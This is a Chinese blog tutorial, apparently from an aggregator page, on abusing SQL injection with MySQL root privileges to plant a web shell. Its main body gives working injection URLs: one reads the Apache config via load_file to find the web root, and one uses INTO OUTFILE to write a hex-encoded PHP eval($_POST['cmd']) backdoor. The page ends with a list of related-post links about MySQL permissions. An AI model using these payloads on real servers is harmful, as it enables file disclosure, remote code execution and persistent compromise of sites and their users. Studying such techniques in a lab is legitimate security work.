mysql root 权限注入_Mysql注入root权限直接写一句话马
标签:
首先我们的找到一个有注入的站:这里我用自己搭建的环境表示;大家不要乱来
http://localhost/pentest/sql/sql_injection_get.php?id=1
发现是root权限,我们尝试直接写马
首先要找到网站的主目录:
数据库目录:D:\wamp\bin\mysql\mysql5.5.20\data\
进行判断,服务器可能为wampserver简易版,httpd.conf文件在D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf
http://localhost/pentest/sql/sql_injection_get.php?id=1‘ and 1=2 union select 1,2,3 load_file(‘D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf‘) from user--+
如果这样不成功,建议将目录转换为hex编码进行:即 load_file(0x443A5C77616D705C62696E5C6170616368655C417061636865322E322E32315C636F6E665C68747470642E636F6E66)
找到了网站目录:D:/wamp/www
我们尝试写:
http://localhost/pentest/sql/sql_injection_get.php?id=1‘ and 1=2 union select 1,2,0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E into outfile ‘D:/wamp/www/xx.php‘ from user --+
<?php eval($_POST[‘cmd‘]);?>的hex编码:0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E
然后访问:http://localhost/xx.php
标签:
mysql root 权限注入_Mysql注入root权限直接写一句话马相关推荐
- 01_SQL注入_Mysql注入利用联合查询的手工注入
01_SQL注入_Mysql注入:利用联合查询的手工注入 1.SQL注入的成因 [严正声明]仅供学习,勿做他用!!! [严正声明]仅供学习,勿做他用!!! [严正声明]仅供学习,勿做他用!!! 遵纪守 ...
- mysql恢复root权限设置密码_MySQL修改root密码及恢复权限的多种方法
方法1: 用SET PASSWORD命令 mysql -u root mysql> SET PASSWORD FOR 'root'@'localhost' = PASSWORD('newpass ...
- mysql root 被锁_MySQL的root权限密码忘记的解决办法
今天是我第一次用MySQL这个软件,我在自己的系统中安装了一个(OS X ),在虚拟机中的windows XP 环境下安装了一个,我希望能在我自己的系统下远程连接到XP 中的MySQL,于是XP环境下 ...
- mysql权限清理_mysql清理用户权限
1.mysql数据库地址文件格式 db:test 10.10.10.10 10.10.10.11 db:profile 10.10.10.12:3306 10.10.10.13:3307 2 ...
- mysql用户及权限管理_MySQL 用户及权限管理
1.mysql用户的定义 在mysql中,用户由用户名和主机域组成的. 1.1 用户名的写法 mysql> create user test1@'localhost'; 注意:用户名不要以数字. ...
- mysql 远程登陆设置_MYSQL远程登录权限设置
Mysql默认关闭远程登录权限,如下操作允许用户在任意地点登录: 1. 进入mysql,GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY ...
- mysql权限问题_Mysql 数据库的权限问题
之前一直对Mysql数据库的权限没太理解 root用户具有最高的权限,也就是超级用户,root用户可以看到数据库中的所有的内容,而其它用户只能对经过root用户授权过的数据库进行操作,如果想在其它用户 ...
- mysql-front权限管理_mysql 用户及权限管理 小结
MySQL 默认有个root用户,但是这个用户权限太大,一般只在管理数据库时候才用.如果在项目中要连接 MySQL 数据库,则建议新建一个权限较小的用户来连接. 在 MySQL 命令行模式下输入如下命 ...
- mysql注入写一句话_Mysql注入root权限直接写一句话马
首先我们的找到一个有注入的站:这里我用自己搭建的环境表示:大家不要乱来 http://localhost/pentest/sql/sql_injection_get.php?id=1 发现是root权 ...
最新文章
- 检查是否支持 SO_REUSEPORT
- TIOBE公布11月榜单:Python势不可挡,超越Java !
- 重庆邮电大学计算机学院院徽,Slide计算机学院-重庆邮电大学.PPT
- 7.0上的新KIE持久性API
- springBoot中自定义的yml文件引用的方式
- 前端学习(2973):配置嵌套路由
- JavaScript——执行环境、变量对象、作用域链
- 虚拟化技术简介--CPU/内存/IO/网络虚拟化介绍
- 算法-lowb三人组
- python(3)-内置函数2
- Hadoop大数据测试:Hadoop大数据平台测试流程
- 【认知无线网络】认知无线网络基础知识学习
- 使用arcgis、matlab与R语言GD包进行地理探测器 批量运行,并导出探测结果
- j3服务器维修教程,服务器维修基本技术手册.docx
- 华表(cell)的使用总结
- 手把手教学暴力破解WIFI密码(仅供学习交流)
- linux常见通配符的含义,linux通配符含义
- linux 内核 浮点运算,ARM64与x86_64浮点运算精度比较
- Redis五大数据类型常用命令与使用场景总结
- 硬件设计——关于电路设计的一些知识
热门文章
- 解决win下安装wordcloud出错问题
- 论文笔记:MTCNN
- sql server 2008 r2 没有维护计划_坚果R2发布,骁龙865+1亿像素+90Hz,4499元起
- boost ref, bind
- MyBatis的架构和其运行流程
- 523. Continuous Subarray Sum
- 《HTML 5与CSS 3权威指南(第3版·下册)》——19.4.2 E:enabled伪类选择器与E:disabled伪类选择器...
- 瞬发大量并发连接 造成MySQL连接不响应的分析
- git、github、gitlab、gitee都是什么?
- Django 3.1.5, CSRF verification failed. Request aborted.